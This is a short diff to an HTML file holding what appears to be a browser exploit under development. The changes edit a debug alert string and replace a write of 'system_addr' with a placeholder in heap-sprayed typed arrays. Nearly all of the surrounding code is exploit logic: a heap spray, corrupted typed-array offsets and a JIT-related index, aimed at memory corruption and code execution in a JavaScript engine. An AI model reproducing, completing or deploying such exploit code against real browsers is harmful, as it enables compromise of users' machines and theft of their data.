--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start6");
+alert("start67");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -166,7 +166,7 @@ spray[spray_index][typedarray_index+0x48/4]=0x3232322E;
 spray[spray_index][typedarray_index+0x4c/4]=0x3232322E;
 spray[spray_index][typedarray_index+0x50/4]=0x3232322E;
 spray[spray_index][typedarray_index+0x54/4]=0x00000000;
-spray[spray_index][typedarray_index+0x100/4]=system_addr;
+spray[spray_index][typedarray_index+0x100/4]=0xffffffff;//system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
